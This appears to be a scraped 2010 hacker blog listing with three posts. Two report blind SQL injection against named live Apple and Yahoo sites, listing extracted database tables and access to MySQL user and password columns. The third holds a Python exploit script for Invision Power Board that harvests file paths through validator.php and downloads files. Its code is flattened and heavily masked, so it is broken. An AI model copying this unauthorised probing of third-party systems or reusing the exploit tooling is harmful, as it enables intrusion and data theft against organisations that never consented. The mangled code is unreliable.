TinKode-APPLE Vulnerable to Blind SQLi

APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010

          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode

@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.

Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.

Testing:

Now let’s see the version

#Version: 5
#Databases: locator_asia, test

#Tables from “locator_asia” database

[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log

#Tables from “test” database

[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp

Columns from “reseller_city_utf8” table

[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4

A good thing is that there is nothing important to extract…
Great, good bye, TinKode

Read More

TinKode-Yahoo Blind SQL Injection

Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010

__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania

Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.

Vulnerable website: http://hk.adspecs.yahoo.com

Testing…

In this picture we can see as SELECT work

Now we try to find the version:

#Version: 5.0.11.24

Ok, it’s normal until now, but we can have access to mysql.user (bad)

And some tables from mysql.user (default)

MySQL Database, Table: user
#user
#password

~TinKode

Read More

TinKode-IPB Full Disclosure Exploit [Python]

IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

#! /usr/bin/env python3.1 ################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(********) == 3: try: print("Please wait...") if args[1] == "********": extract_parse_save(********)) elif args[1] == "********": download_data(********]) except Exception as message: print("An error occurred: ********)) except: print("Unknown error.") else: print(********") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with ********.********) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[********):] value = source[:source.index(********)] hurl = url ********.format(********) else: print("[!]Token not found.") print("[+]********...") with urllib.request.******** as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find(********) if index != -1: lastk = line[index + ********" ").strip(********) index = line.find(********") if index != -1: lastv = line[index + ********:line.index("********")].********(" ") if lastk != None and lastv != None: index = ********") if index in (********, 0): lastk = "[other] {}".format(lastk) else: lastk = "[********}".format(********) dictionary[********astv ******** = None, None print("[+]Organizing and saving paths...") with open("********", "********") as fout: fout.write(********) keys = sorted(********) for key in keys: fout.write(********)) def download_data(files): print("[+]Searching ********...") mthreads = ******** with open(********) as fin: url = fin.readline()********) if files.find("*") == -1: hurl = ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = l********) if pieces[0].count(ext) == 1: upath = pieces[1] hurl = ********) while threading.active********reads: pass Download(********) while threading.active_count(******** pass class Download(********): def __********): threading.Thread.********) ******** = url def run(self): try: with urllib.request.urlopen(********usock: data = ********) uparser = urllib.parse.urlparse(********) pieces = uparser.********) ******** = pieces[********] with open(********) as fout: fout.********) except: pass ********__main__": main()

You must have python 3.1 to work!

Read More